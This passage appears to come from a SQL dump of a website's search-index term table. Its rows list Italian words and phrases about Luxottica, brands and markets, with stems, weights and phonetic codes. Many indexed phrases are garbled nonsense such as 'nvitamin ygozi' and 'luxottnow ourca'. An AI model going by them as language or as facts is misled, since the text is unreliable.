vecchio',0,1,1.7667,'L5634312',1,'en'),(30926,'lezione','lezion',0,0,0.4667,'L250',1,'en'),(30927,'lezione di','lezion di',0,1,1.3333,'L253',1,'en'),(30928,'lezione di leonardo','lezion di leonardo',0,1,1.6333,'L2534563',1,'en'),(30929,'li','li',0,0,0.1333,'L000',1,'en'),(30930,'li raggiungeremo','li raggiungeremo',0,1,1.5333,'L625265',1,'en'),(30931,'li raggiungeremo mum','li raggiungeremo mum',0,1,1.6667,'L625265',1,'en'),(30932,'licenza','licenza',0,0,0.4667,'L252',1,'en'),(30933,'licenza con','licenza con',0,1,1.3667,'L2525',1,'en'),(30934,'licenza con dolce','licenza con dolce',0,1,1.5667,'L2525342',1,'en'),(30935,'licenze','licenz',0,0,0.4667,'L252',1,'en'),(30936,'licenze chi','licenz chi',0,1,1.3667,'L252',1,'en'),(30937,'licenze chi è','licenz chi è',0,1,1.4333,'L252',1,'en'),(30938,'limitarsi','limitarsi',0,0,0.6,'L5362',1,'en'),(30939,'limitarsi a','limitarsi a',0,1,1.3667,'L5362',1,'en'),(30940,'limitarsi a farlo','limitarsi a farlo',0,1,1.5667,'L5362164',1,'en'),(30941,'linea integrare','linea integrare',0,1,1.5,'L5326',1,'en'),(30942,'linea integrare le','linea integrare le',0,1,1.6,'L53264',1,'en'),(30943,'linee','line',0,0,0.3333,'L500',1,'en'),(30944,'linee più','line più',0,1,1.3,'L510',1,'en'),(30945,'linee più exact','line più exact',0,1,1.5,'L5123',1,'en'),(30946,'lo','lo',0,0,0.1333,'L000',1,'en'),(30947,'lo più','lo più',0,1,1.2,'L100',1,'en'),(30948,'lo più si','lo più si',0,1,1.3,'L120',1,'en'),(30949,'locali','locali',0,0,0.4,'L240',1,'en'),(30950,'locali scam','locali scam',0,1,1.3667,'L2425',1,'en'),(30951,'locali scam la','locali scam la',0,1,1.4667,'L24254',1,'en'),(30952,'loro','loro',0,0,0.2667,'L600',1,'en'),(30953,'loro esista','loro esista',0,1,1.3667,'L623',1,'en'),(30954,'loro esista una','loro esista una',0,1,1.5,'L6235',1,'en'),(30955,'los angeles barriera','lo angeles barriera',0,1,1.6667,'L2524216',1,'en'),(30956,'los angeles moda','lo angeles moda',0,1,1.5333,'L2524253',1,'en'),(30957,'los angeles turchia','lo angeles turchia',0,1,1.6333,'L25242362',1,'en'),(30958,'low so','low so',0,1,1.2,'L200',1,'en'),(30959,'low so se','low so se',0,1,1.3,'L200',1,'en'),(30960,'lunited','lunit',0,0,0.4667,'L530',1,'en'),(30961,'lunited nationsgo','lunit nationsgo',0,1,1.5667,'L535352',1,'en'),(30962,'lunited nationsgo as','lunit nationsgo as',0,1,1.6667,'L535352',1,'en'),(30963,'lusso','lusso',0,0,0.3333,'L200',1,'en'),(30964,'lusso oggi','lusso oggi',0,1,1.3333,'L200',1,'en'),(30965,'lusso oggi nel','lusso oggi nel',0,1,1.4667,'L254',1,'en'),(30966,'lusso oppure','lusso oppure',0,1,1.4,'L216',1,'en'),(30967,'lusso oppure avere','lusso oppure avere',0,1,1.6,'L21616',1,'en'),(30968,'lusso questo','lusso questo',0,1,1.4,'L230',1,'en'),(30969,'lusso questo significa','lusso questo significa',0,1,1.7333,'L232512',1,'en'),(30970,'luxottica','luxottica',0,0,0.6,'L232',1,'en'),(30971,'luxottica dal','luxottica dal',0,1,1.4333,'L23234',1,'en'),(30972,'luxottica dal ciclo','luxottica dal ciclo',0,1,1.6333,'L2323424',1,'en'),(30973,'luxottica di','luxottica di',0,1,1.4,'L2323',1,'en'),(30974,'luxottica di do','luxottica di do',0,1,1.5,'L2323',1,'en'),(30975,'luxottica è','luxottica è',0,1,1.3667,'L232',1,'en'),(30976,'luxottica è stata','luxottica è stata',0,1,1.5667,'L2323',1,'en'),(30977,'luxottica già','luxottica già',0,1,1.4333,'L232',1,'en'),(30978,'luxottica già oggi','luxottica già oggi',0,1,1.6,'L232',1,'en'),(30979,'luxottica intanto','luxottica intanto',0,1,1.5667,'L2325353',1,'en'),(30980,'luxottica intanto nei','luxottica intanto nei',0,1,1.7,'L23253535',1,'en'),(30981,'luxottica los','luxottica los',0,1,1.4333,'L23242',1,'en'),(30982,'luxottica los angeles','luxottica los angeles',0,1,1.7,'L232425242',1,'en'),(30983,'luxottica obiettivo','luxottica obiettivo',0,1,1.6333,'L232131',1,'en'),(30984,'luxottica obiettivo 5','luxottica obiettivo 5',0,1,1.7,'L232131',1,'en'),(30985,'luxottica vuole','luxottica vuole',0,1,1.5,'L23214',1,'en'),(30986,'luxottica vuole essere','luxottica vuole essere',0,1,1.7333,'L2321426',1,'en'),(30987,'luxottnow','luxottnow',0,0,0.6,'L235',1,'en'),(30988,'luxottnow ourca','luxottnow ourca',0,1,1.5,'L23562',1,'en'),(30989,'luxottnow ourca preferisco','luxottnow ourca preferisco',0,1,1.8667,'L2356216162',1,'en'),(30990,'ma','ma',0,0,0.1333,'M000',3,'en'),(30991,'ma cinque','ma cinque',0,1,1.3,'M252',1,'en'),(30992,'ma cinque anni','ma cinque anni',0,1,1.4667,'M2525',1,'en'),(30993,'ma è','ma è',0,1,1.1333,'M000',1,'en'),(30994,'ma è evidente','ma è evidente',0,1,1.4333,'M1353',1,'en'),(30995,'ma non','ma non',0,1,1.2,'M000',1,'en'),(30996,'ma non si','ma non si',0,1,1.3,'M200',1,'en'),(30997,'ma penso','ma penso',0,1,1.2667,'M152',1,'en'),(30998,'ma penso gna','ma penso gna',0,1,1.4,'M1525',1,'en'),(30999,'ma per','ma per',0,1,1.2,'M160',1,'en'),(31000,'ma per il','ma per il',0,1,1.3,'M164',1,'en'),(31001,'ma per tutta','ma per tutta',0,1,1.4,'M163',1,'en'),(31002,'macchina','macchina',0,0,0.5333,'M250',1,'en'),(31003,'macchina operativa','macchina operativa',0,1,1.6,'M251631',1,'en'),(31004,'macchina operativa quali','macchina operativa quali',0,1,1.8,'M25163124',1,'en'),(31005,'marchi','marchi',0,0,0.4,'M620',1,'en'),(31006,'marchi at','marchi at',0,1,1.3,'M623',1,'en'),(31007,'marchi at o','marchi at o',0,1,1.3667,'M623',1,'en'),(31008,'marchi e','marchi e',0,1,1.2667,'M620',1,'en'),(31009,'marchi e marketing','marchi e marketing',0,1,1.6,'M62562352',1,'en'),(31010,'marchi più','marchi più',0,1,1.3333,'M621',1,'en'),(31011,'marchi più robusto','marchi più robusto',0,1,1.6,'M6216123',1,'en'),(31012,'marchi sono','marchi sono',0,1,1.3667,'M625',1,'en'),(31013,'marchi sono usciti','marchi sono usciti',0,1,1.6,'M62523',1,'en'),(31014,'marchi sulla','marchi sulla',0,1,1.4,'M624',1,'en'),(31015,'marchi sulla diversificazione','marchi sulla diversificazione',0,1,1.9667,'M6243162125',1,'en'),(31016,'marchi throughout','marchi throughout',0,1,1.5667,'M623623',1,'en'),(31017,'marchi throughout portafoglio','marchi throughout portafoglio',0,1,1.9667,'M623623163124',1,'en'),(31018,'marchio','marchio',0,0,0.4667,'M620',1,'en'),(31019,'marchio brasiliano','marchio brasiliano',0,1,1.6,'M6216245',1,'en'),(31020,'marchio brasiliano o','marchio brasiliano o',0,1,1.6667,'M6216245',1,'en'),(31021,'marchio cinese','marchio cinese',0,1,1.4667,'M6252',1,'en'),(31022,'marchio cinese nope','marchio cinese nope',0,1,1.6333,'M625251',1,'en'),(31023,'marchio di','marchio di',0,1,1.3333,'M623',1,'en'),(31024,'marchio di punta','marchio di punta',0,1,1.5333,'M623153',1,'en'),(31025,'marketing and','market and',0,1,1.4333,'M6235253',1,'en'),(31026,'marketing and providing','market and providing',0,1,1.7667,'M6235253161352',1,'en'),(31027,'marzo','marzo',0,0,0.3333,'M620',1,'en'),(31028,'marzo la','marzo la',0,1,1.2667,'M624',1,'en'),(31029,'marzo la cosa','marzo la cosa',0,1,1.4333,'M6242',1,'en'),(31030,'means gall','mean gall',0,1,1.3333,'M240',1,'en'),(31031,'means gall of','mean gall of',0,1,1.4333,'M241',1,'en'),(31032,'medie','medi',0,0,0.3333,'M300',1,'en'),(31033,'medie acquisizioni','medi acquisizioni',0,1,1.6,'M325',1,'en'),(31034,'medie acquisizioni di','medi acquisizioni di',0,1,1.7,'M3253',1,'en'),(31035,'medio','medio',0,0,0.3333,'M300',1,'en'),(31036,'medio piccole','medio piccole',0,1,1.4333,'M3124',1,'en'),(31037,'medio piccole la','medio piccole la',0,1,1.5333,'M3124',1,'en'),(31038,'meglio','meglio',0,0,0.4,'M240',1,'en'),(31039,'meglio degli','meglio degli',0,1,1.4,'M24324',1,'en'),(31040,'meglio degli europei','meglio degli europei',0,1,1.6667,'M2432461',1,'en'),(31041,'meglio sui','meglio sui',0,1,1.3333,'M242',1,'en'),(31042,'meglio sui 130','meglio sui 130',0,1,1.4667,'M242',1,'en'),(31043,'mente','ment',0,0,0.3333,'M300',1,'en'),(31044,'mente alcuna','ment alcuna',0,1,1.4,'M3425',1,'en'),(31045,'mente alcuna diversificazione','ment alcuna diversificazione',0,1,1.9667,'M34253162125',1,'en'),(31046,'mente low','ment low',0,1,1.3,'M340',1,'en'),(31047,'mente low so','ment low so',0,1,1.4,'M342',1,'en'),(31048,'mentorsince','mentorsinc',0,0,0.7333,'M36252',1,'en'),(31049,'mentorsince you','mentorsinc you',0,1,1.5,'M36252',1,'en'),(31050,'mentorsince you persone','mentorsinc you persone',0,1,1.7667,'M362521625',1,'en'),(31051,'mercati','mercati',0,0,0.4667,'M623',1,'en'),(31052,'mercati emergenti','mercati emergenti',0,1,1.5667,'M62356253',1,'en'),(31053,'mercati emergenti e','mercati emergenti e',0,1,1.6333,'M62356253',1,'en'),(31054,'mercato','mercato',0,0,0.4667,'M623',1,'en'),(31055,'mercato gna','mercato gna',0,1,1.3667,'M62325',1,'en'),(31056,'mercato gna sta','mercato gna sta',0,1,1.5,'M6232523',1,'en'),(31057,'mercato molto','mercato molto',0,1,1.4333,'M623543',1,'en'),(31058,'mercato molto difficile','mercato molto difficile',0,1,1.7667,'M623543124',1,'en'),(31059,'mercato più','mercato più',0,1,1.3667,'M6231',1,'en'),(31060,'mercato più grande','mercato più grande',0,1,1.6,'M62312653',1,'en'),(31061,'mercato sia','mercato sia',0,1,1.3667,'M6232',1,'en'),(31062,'mercato sia saturo','mercato sia saturo',0,1,1.6,'M623236',1,'en'),(31063,'messaggi','messaggi',0,0,0.5333,'M200',1,'en'),(31064,'messaggi noi','messaggi noi',0,1,1.4,'M250',1,'en'),(31065,'messaggi noi oggi','messaggi noi oggi',0,1,1.5667,'M252',1,'en'),(31066,'mestiere','mestier',0,0,0.5333,'M236',1,'en'),(31067,'mestiere è','mestier è',0,1,1.3333,'M236',1,'en'),(31068,'mestiere è la','mestier è la',0,1,1.4333,'M2364',1,'en'),(31069,'miliardi','miliardi',0,0,0.5333,'M463',1,'en'),(31070,'miliardi as','miliardi as',0,1,1.3667,'M4632',1,'en'),(31071,'miliardi as a','miliardi as a',0,1,1.4333,'M4632',1,'en'),(31072,'miliardi di','miliardi di',0,1,1.3667,'M463',1,'en'),(31073,'miliardi di fatturato','miliardi di fatturato',0,1,1.7,'M4631363',1,'en'),(31074,'miliardi dobbiamo','miliardi dobbiamo',0,1,1.5667,'M46315',1,'en'),(31075,'miliardi dobbiamo averli','miliardi dobbiamo averli',0,1,1.8,'M46315164',1,'en'),(31076,'miliardi ingl\'','miliardi ingl',0,1,1.4667,'M463524',1,'en'),(31077,'miliardi ingl\' inizio','miliardi ingl inizio',0,1,1.7,'M46352452',1,'en'),(31078,'miliardi l\'','miliardi l',0,1,1.3667,'M4634',1,'en'),(31079,'miliardi l\' anno','miliardi l anno',0,1,1.5333,'M46345',1,'en'),(31080,'milioni','milioni',0,0,0.4667,'M450',1,'en'),(31081,'milioni di','milioni di',0,1,1.3333,'M453',1,'en'),(31082,'milioni di fatturato','milioni di fatturato',0,1,1.6667,'M4531363',1,'en'),(31083,'milioni ora','milioni ora',0,1,1.3667,'M456',1,'en'),(31084,'milioni ora stiamo','milioni ora stiamo',0,1,1.6,'M456235',1,'en'),(31085,'minus tiffany','minu tiffany',0,1,1.4333,'M2315',1,'en'),(31086,'minus tiffany quali','minu tiffany quali',0,1,1.6333,'M231524',1,'en'),(31087,'moda','moda',0,0,0.2667,'M300',2,'en'),(31088,'moda e','moda e',0,1,1.2,'M300',1,'en'),(31089,'moda e il','moda e il',0,1,1.3,'M340',1,'en'),(31090,'modalit','modalit',0,0,0.4667,'M343',1,'en'),(31091,'modalit e','modalit e',0,1,1.3,'M343',1,'en'),(31092,'modalit e forma','modalit e forma',0,1,1.5,'M343165',1,'en'),(31093,'molto','molto',0,0,0.3333,'M430',2,'en'),(31094,'molto attenti','molto attenti',0,1,1.4333,'M4353',1,'en'),(31095,'molto attenti con','molto attenti con',0,1,1.5667,'M435325',1,'en'),(31096,'molto difficile','molto difficile',0,1,1.5,'M43124',1,'en'),(31097,'molto difficile e','molto difficile e',0,1,1.5667,'M43124',1,'en'),(31098,'molto risponde','molto risponde',0,1,1.4667,'M4362153',1,'en'),(31099,'molto risponde disadvantage','molto risponde disadvantage',0,1,1.9,'M4362153231532',1,'en'),(31100,'mondiale','mondial',0,0,0.5333,'M340',1,'en'),(31101,'mondiale dell\'','mondial dell',0,1,1.4667,'M3434',1,'en'),(31102,'mondiale dell\' occhialeria','mondial dell occhialeria',0,1,1.8667,'M3434246',1,'en'),(31103,'mondo','mondo',0,0,0.3333,'M300',1,'en'),(31104,'mondo for','mondo for',0,1,1.3,'M316',1,'en'),(31105,'mondo for imespec','mondo for imespec',0,1,1.5667,'M3165212',1,'en'),(31106,'mondo gna','mondo gna',0,1,1.3,'M325',1,'en'),(31107,'mondo gna conosciamo','mondo gna conosciamo',0,1,1.6667,'M3252525',1,'en'),(31108,'mondo luxottica','mondo luxottica',0,1,1.5,'M34232',1,'en'),(31109,'mondo luxottica vuole','mondo luxottica vuole',0,1,1.7,'M3423214',1,'en'),(31110,'moschino','moschino',0,0,0.5333,'M250',1,'en'),(31111,'moschino u','moschino u',0,1,1.3333,'M250',1,'en'),(31112,'moschino u svitamin','moschino u svitamin',0,1,1.6333,'M252135',1,'en'),(31113,'mother','mother',0,0,0.4,'M360',2,'en'),(31114,'mother anche','mother anche',0,1,1.4,'M3652',1,'en'),(31115,'mother anche nell\'','mother anche nell',0,1,1.6,'M365254',1,'en'),(31116,'mother è','mother è',0,1,1.2667,'M360',1,'en'),(31117,'mother è sicuramente','mother è sicuramente',0,1,1.6667,'M362653',1,'en'),(31118,'mother occorrerà','mother occorrerà',0,1,1.5333,'M3626',1,'en'),(31119,'mother occorrerà anche','mother occorrerà anche',0,1,1.7333,'M362652',1,'en'),(31120,'mum i','mum i',0,1,1.1667,'M000',1,'en'),(31121,'mum i 5','mum i 5',0,1,1.2333,'M000',1,'en'),(31122,'n\',','n',0,0,0.2,'N000',1,'en'),(31123,'n\', not','n not',0,1,1.2333,'N300',1,'en'),(31124,'n\', not abbiamo','n not abbiamo',0,1,1.5,'N315',1,'en'),(31125,'n\'t','n',0,0,0.2,'N300',2,'en'),(31126,'n\'t grande','n grande',0,1,1.3333,'N32653',1,'en'),(31127,'n\'t grande lavoro','n grande lavoro',0,1,1.5667,'N32653416',1,'en'),(31128,'nation è','nation è',0,1,1.2667,'N350',1,'en'),(31129,'nation è il','nation è il',0,1,1.3667,'N354',1,'en'),(31130,'nations grande','nation grande',0,1,1.4667,'N352653',1,'en'),(31131,'nations grande marchio','nation grande marchio',0,1,1.7333,'N352653562',1,'en'),(31132,'nationsgo','nationsgo',0,0,0.6,'N352',1,'en'),(31133,'nationsgo as','nationsgo as',0,1,1.4,'N352',1,'en'),(31134,'nationsgo as profondità','nationsgo as profondità',0,1,1.7667,'N35216153',1,'en'),(31135,'ne','ne',0,0,0.1333,'N000',1,'en'),(31136,'ne abbiamo','ne abbiamo',0,1,1.3333,'N150',1,'en'),(31137,'ne abbiamo di','ne abbiamo di',0,1,1.4333,'N153',1,'en'),(31138,'ne faremo','ne faremo',0,1,1.3,'N165',1,'en'),(31139,'ne faremo quest\'','ne faremo quest',0,1,1.5333,'N16523',1,'en'),(31140,'negozi','negozi',0,0,0.4,'N200',1,'en'),(31141,'negozi all\'','negozi all',0,1,1.3667,'N240',1,'en'),(31142,'negozi all\' avanguardia','negozi all avanguardia',0,1,1.7667,'N2415263',1,'en'),(31143,'negozi che','negozi che',0,1,1.3333,'N200',1,'en'),(31144,'negozi che believe','negozi che believe',0,1,1.6,'N2141',1,'en'),(31145,'nei','nei',0,0,0.2,'N000',1,'en'),(31146,'nei giorni','nei giorni',0,1,1.3333,'N265',1,'en'),(31147,'nei giorni scorsi','nei giorni scorsi',0,1,1.5667,'N265262',1,'en'),(31148,'nel','nel',0,0,0.2,'N400',1,'en'),(31149,'nel 2006','nel 2006',0,1,1.2667,'N400',1,'en'),(31150,'nel 2006 siamo','nel 2006 siamo',0,1,1.4667,'N425',1,'en'),(31151,'nel biennio','nel biennio',0,1,1.3667,'N415',1,'en'),(31152,'nel biennio passato','nel biennio passato',0,1,1.6333,'N415123',1,'en'),(31153,'nel breve','nel breve',0,1,1.3,'N4161',1,'en'),(31154,'nel breve termine','nel breve termine',0,1,1.5667,'N4161365',1,'en'),(31155,'nel lavoro','nel lavoro',0,1,1.3333,'N416',1,'en'),(31156,'nel lavoro cosa','nel lavoro cosa',0,1,1.5,'N4162',1,'en'),(31157,'nel mondo','nel mondo',0,1,1.3,'N453',1,'en'),(31158,'nel mondo gna','nel mondo gna',0,1,1.4333,'N45325',1,'en'),(31159,'nel nord','nel nord',0,1,1.2667,'N4563',1,'en'),(31160,'nel nord usa','nel nord usa',0,1,1.4,'N45632',1,'en'),(31161,'nell\'','nell',0,0,0.3333,'N400',1,'en'),(31162,'nell\' organizzazione','nell organizzazione',0,1,1.6667,'N462525',1,'en'),(31163,'nell\' organizzazione con','nell organizzazione con',0,1,1.8,'N46252525',1,'en'),(31164,'nell\' organizzazione i','nell organizzazione i',0,1,1.7333,'N462525',1,'en'),(31165,'nello','nello',0,0,0.3333,'N400',1,'en'),(31166,'nello scoprire','nello scoprire',0,1,1.4667,'N4216',1,'en'),(31167,'nello scoprire los','nello scoprire los',0,1,1.6,'N421642',1,'en'),(31168,'nii','nii',0,0,0.2,'N000',1,'en'),(31169,'nii nostri','nii nostri',0,1,1.3333,'N236',1,'en'),(31170,'nii nostri nvitamin','nii nostri nvitamin',0,1,1.6333,'N2365135',1,'en'),(31171,'noi','noi',0,0,0.2,'N000',1,'en'),(31172,'noi dobbiamo','noi dobbiamo',0,1,1.4,'N315',1,'en'),(31173,'noi dobbiamo avere','noi dobbiamo avere',0,1,1.6,'N31516',1,'en'),(31174,'noi oggi','noi oggi',0,1,1.2667,'N200',1,'en'),(31175,'noi oggi in','noi oggi in',0,1,1.3667,'N250',1,'en'),(31176,'non by','non by',0,1,1.2,'N100',2,'en'),(31177,'non by yourself','non by yourself',0,1,1.5,'N16241',2,'en'),(31178,'non ha','non ha',0,1,1.2,'N000',1,'en'),(31179,'non ha la','non ha la',0,1,1.3,'N400',1,'en'),(31180,'non si','non si',0,1,1.2,'N200',1,'en'),(31181,'non si può','non si può',0,1,1.3333,'N210',1,'en'),(31182,'non single','non single',0,1,1.3333,'N2524',1,'en'),(31183,'non single per','non single per',0,1,1.4667,'N252416',1,'en'),(31184,'nope','nope',0,0,0.2667,'N100',1,'en'),(31185,'nope credo','nope credo',0,1,1.3333,'N1263',1,'en'),(31186,'nope credo di','nope credo di',0,1,1.4333,'N1263',1,'en'),(31187,'nord','nord',0,0,0.2667,'N630',1,'en'),(31188,'nord the','nord the',0,1,1.2667,'N630',1,'en'),(31189,'nord the nation','nord the nation',0,1,1.5,'N63535',1,'en'),(31190,'nord usa','nord usa',0,1,1.2667,'N632',1,'en'),(31191,'nord usa quasi','nord usa quasi',0,1,1.4667,'N632',1,'en'),(31192,'nostra','nostra',0,0,0.4,'N236',1,'en'),(31193,'nostra controllata','nostra controllata',0,1,1.6,'N236253643',1,'en'),(31194,'nostra controllata ray','nostra controllata ray',0,1,1.7333,'N2362536436',1,'en'),(31195,'nostri','nostri',0,0,0.4,'N236',2,'en'),(31196,'nostri nvitamin','nostri nvitamin',0,1,1.5,'N2365135',1,'en'),(31197,'nostri nvitamin ygozi','nostri nvitamin ygozi',0,1,1.7,'N23651352',1,'en'),(31198,'nostro','nostro',0,0,0.4,'N236',1,'en'),(31199,'nostro consumatore','nostro consumatore',0,1,1.6,'N236252536',1,'en'),(31200,'nostro consumatore visto','nostro consumatore visto',0,1,1.8,'N236252536123',1,'en'),(31201,'nostro gruppo','nostro gruppo',0,1,1.4333,'N236261',1,'en'),(31202,'nostro gruppo è','nostro gruppo è',0,1,1.5,'N236261',1,'en'),(31203,'not abbiamo','not abbiamo',0,1,1.3667,'N315',1,'en'),(31204,'not abbiamo in','not abbiamo in',0,1,1.4667,'N315',1,'en'),(31205,'not lavoro','not lavoro',0,1,1.3333,'N3416',1,'en'),(31206,'not lavoro lunited','not lavoro lunited',0,1,1.6,'N3416453',1,'en'),(31207,'nuova buona','nuova buona',0,1,1.3667,'N150',1,'en'),(31208,'nuova buona crescita','nuova buona crescita',0,1,1.6667,'N152623',1,'en'),(31209,'nuove acquisizioni','nuov acquisizioni',0,1,1.6,'N125',1,'en'),(31210,'nuove acquisizioni di','nuov acquisizioni di',0,1,1.7,'N1253',1,'en'),(31211,'nvitamin','nvitamin',0,0,0.5333,'N135',1,'en'),(31212,'nvitamin ygozi','nvitamin ygozi',0,1,1.4667,'N1352',1,'en'),(31213,'nvitamin ygozi sat','nvitamin ygozi sat',0,1,1.6,'N13523',1,'en'),(31214,'o di','o di',0,1,1.1333,'O300',1,'en'),(31215,'o di ogni','o di ogni',0,1,1.3,'O325',1,'en'),(31216,'o di sperimentarsi','o di sperimentarsi',0,1,1.6,'O32165362',1,'en'),(31217,'o indiano','o indiano',0,1,1.3,'O535',1,'en'),(31218,'o indiano stento','o indiano stento',0,1,1.5333,'O5352353',1,'en'),(31219,'o interne','o interne',0,1,1.3,'O5365',1,'en'),(31220,'o interne alla','o interne alla',0,1,1.4667,'O53654',1,'en'),(31221,'o los','o los',0,1,1.1667,'O420',1,'en'),(31222,'o los angeles','o los angeles',0,1,1.4333,'O425242',1,'en'),(31223,'obiettivo','obiettivo',0,0,0.6,'O131',1,'en'),(31224,'obiettivo 5','obiettivo 5',0,1,1.3667,'O131',1,'en'),(31225,'obiettivo 5 miliardi','obiettivo 5 miliardi',0,1,1.6667,'O1315463',1,'en'),(31226,'occhialeria','occhialeria',0,0,0.7333,'O246',1,'en'),(31227,'occhialeria ma','occhialeria ma',0,1,1.4667,'O2465',1,'en'),(31228,'occhialeria ma è','occhialeria ma è',0,1,1.5333,'O2465',1,'en'),(31229,'occhiali','occhiali',0,0,0.5333,'O240',2,'en'),(31230,'occhiali da','occhiali da',0,1,1.3667,'O243',2,'en'),(31231,'occhiali da sole','occhiali da sole',0,1,1.5333,'O24324',1,'en'),(31232,'occhiali ma','occhiali ma',0,1,1.3667,'O245',1,'en'),(31233,'occhiali ma per','occhiali ma per',0,1,1.5,'O24516',1,'en'),(31234,'occorrerà','occorrerà',0,0,0.6,'O260',1,'en'),(31235,'occorrerà anche','occorrerà anche',0,1,1.5,'O2652',1,'en'),(31236,'occorrerà anche della','occorrerà anche della',0,1,1.7,'O265234',1,'en'),(31237,'of anni','of anni',0,1,1.2333,'O150',1,'en'),(31238,'of anni fa','of anni fa',0,1,1.3333,'O151',1,'en'),(31239,'of asia','of asia',0,1,1.2333,'O120',1,'en'),(31240,'of asia di','of asia di',0,1,1.3333,'O123',1,'en'),(31241,'of india','of india',0,1,1.2667,'O153',1,'en'),(31242,'of india società','of india società',0,1,1.5333,'O15323',1,'en'),(31243,'of thesonali','of thesonali',0,1,1.4,'O13254',1,'en'),(31244,'of thesonali e','of thesonali e',0,1,1.4667,'O13254',1,'en'),(31245,'of us','of us',0,1,1.1667,'O120',2,'en'),(31246,'of us puntauthored','of us puntauthored',0,1,1.6,'O1215363',1,'en'),(31247,'of usustmy','of usustmy',0,1,1.3333,'O1235',1,'en'),(31248,'of usustmy personal','of usustmy personal',0,1,1.6333,'O123516254',1,'en'),(31249,'offerta','offerta',0,0,0.4667,'O163',1,'en'),(31250,'offerta pubblica','offerta pubblica',0,1,1.5333,'O163142',1,'en'),(31251,'offerta pubblica per','offerta pubblica per',0,1,1.6667,'O16314216',1,'en'),(31252,'oggi abbiamo','oggi abbiamo',0,1,1.4,'O215',1,'en'),(31253,'oggi abbiamo una','oggi abbiamo una',0,1,1.5333,'O215',1,'en'),(31254,'oggi all','oggi all',0,1,1.2667,'O240',1,'en'),(31255,'oggi all of','oggi all of',0,1,1.3667,'O241',1,'en'),(31256,'oggi in','oggi in',0,1,1.2333,'O250',1,'en'),(31257,'oggi in cina','oggi in cina',0,1,1.4,'O2525',1,'en'),(31258,'oggi in tiongkok','oggi in tiongkok',0,1,1.5333,'O25352',1,'en'),(31259,'oggi nel','oggi nel',0,1,1.2667,'O254',1,'en'),(31260,'oggi nel nord','oggi nel nord',0,1,1.4333,'O254563',1,'en'),(31261,'ogni','ogni',0,0,0.2667,'O250',2,'en'),(31262,'ogni altro','ogni altro',0,1,1.3333,'O25436',1,'en'),(31263,'ogni altro satgno','ogni altro satgno',0,1,1.5667,'O254362325',1,'en'),(31264,'ogni diritto','ogni diritto',0,1,1.4,'O25363',1,'en'),(31265,'ogni diritto di','ogni diritto di',0,1,1.5,'O25363',1,'en'),(31266,'ogni forma','ogni forma',0,1,1.3333,'O25165',1,'en'),(31267,'ogni forma di','ogni forma di',0,1,1.4333,'O251653',1,'en'),(31268,'older abbondantemente','older abbondantemente',0,1,1.7,'O4361535353',1,'en'),(31269,'older abbondantemente sopra','older abbondantemente sopra',0,1,1.9,'O4361535353216',1,'en'),(31270,'oltre','oltr',0,0,0.3333,'O436',1,'en'),(31271,'oltre a','oltr a',0,1,1.2333,'O436',1,'en'),(31272,'oltre a somewhat','oltr a somewhat',0,1,1.5333,'O436253',1,'en'),(31273,'operativa','operativa',0,0,0.6,'O1631',1,'en'),(31274,'operativa quali','operativa quali',0,1,1.5,'O163124',1,'en'),(31275,'operativa quali sono','operativa quali sono',0,1,1.6667,'O16312425',1,'en'),(31276,'operazioni','operazioni',0,0,0.6667,'O1625',1,'en'),(31277,'operazioni straordinarie','operazioni straordinarie',0,1,1.8,'O1625236356',1,'en'),(31278,'operazioni straordinarie perché','operazioni straordinarie perché',0,1,2,'O1625236356162',1,'en'),(31279,'opportunità','opportunità',0,0,0.7333,'O16353',1,'en'),(31280,'opportunità ne','opportunità ne',0,1,1.4667,'O163535',1,'en'),(31281,'opportunità ne abbiamo','opportunità ne abbiamo',0,1,1.7333,'O16353515',1,'en'),(31282,'opportunità nel','opportunità nel',0,1,1.5,'O1635354',1,'en'),(31283,'opportunità nel mondo','opportunità nel mondo',0,1,1.7,'O163535453',1,'en'),(31284,'oppure','oppur',0,0,0.4,'O160',1,'en'),(31285,'oppure avere','oppur avere',0,1,1.4,'O1616',1,'en'),(31286,'oppure avere altri','oppur avere altri',0,1,1.6,'O1616436',1,'en'),(31287,'ora stiamo','ora stiamo',0,1,1.3333,'O6235',1,'en'),(31288,'ora stiamo lanciando','ora stiamo lanciando',0,1,1.6667,'O623545253',1,'en'),(31289,'organica','organica',0,0,0.5333,'O6252',1,'en'),(31290,'organica facendo','organica facendo',0,1,1.5333,'O62521253',1,'en'),(31291,'organica facendo n\'t','organica facendo n',0,1,1.6667,'O6252125353',1,'en'),(31292,'organizzativa','organizzativa',0,0,0.8667,'O625231',1,'en'),(31293,'organizzativa veramente','organizzativa veramente',0,1,1.7667,'O625231653',1,'en'),(31294,'organizzativa veramente globale','organizzativa veramente globale',0,1,2,'O6252316532414',1,'en'),(31295,'organizzazione','organizzazion',0,0,0.9333,'O62525',1,'en'),(31296,'organizzazione con','organizzazion con',0,1,1.6,'O6252525',1,'en'),(31297,'organizzazione con risorse','organizzazion con risorse',0,1,1.8667,'O62525256262',1,'en'),(31298,'organizzazione i','organizzazion i',0,1,1.5333,'O62525',1,'en'),(31299,'organizzazione i quatsto','organizzazion i quatsto',0,1,1.8,'O625252323',1,'en'),(31300,'organizzazione sul','organizzazion sul',0,1,1.6,'O6252524',1,'en'),(31301,'organizzazione sul portafoglio','organizzazion sul portafoglio',0,1,2,'O6252524163124',1,'en'),(31302,'originate','origin',0,0,0.6,'O6253',1,'en'),(31303,'originate un','origin un',0,1,1.4,'O62535',1,'en'),(31304,'originate un incubo','origin un incubo',0,1,1.6333,'O6253521',1,'en'),(31305,'otto','otto',0,0,0.2667,'O300',1,'en'),(31306,'otto anni','otto anni',0,1,1.3,'O350',1,'en'),(31307,'otto anni abbiamo','otto anni abbiamo',0,1,1.5667,'O3515',1,'en'),(31308,'ourca','ourca',0,0,0.3333,'O620',1,'en'),(31309,'ourca preferisco','ourca preferisco',0,1,1.5333,'O6216162',1,'en'),(31310,'ourca preferisco parlare','ourca preferisco parlare',0,1,1.8,'O62161621646',1,'en'),(31311,'paesi','paesi',0,0,0.3333,'P200',1,'en'),(31312,'paesi travel','paesi travel',0,1,1.4,'P23614',1,'en'),(31313,'paesi travel la','paesi travel la',0,1,1.5,'P23614',1,'en'),(31314,'pages 2','page 2',0,1,1.2333,'P200',1,'en'),(31315,'paradiso','paradiso',0,0,0.5333,'P632',1,'en'),(31316,'paradiso dobbiamo','paradiso dobbiamo',0,1,1.5667,'P632315',1,'en'),(31317,'paradiso dobbiamo focus','paradiso dobbiamo focus',0,1,1.7667,'P63231512',1,'en'),(31318,'parlare','parlar',0,0,0.4667,'P646',1,'en'),(31319,'parlare di','parlar di',0,1,1.3333,'P6463',1,'en'),(31320,'parlare di sfide','parlar di 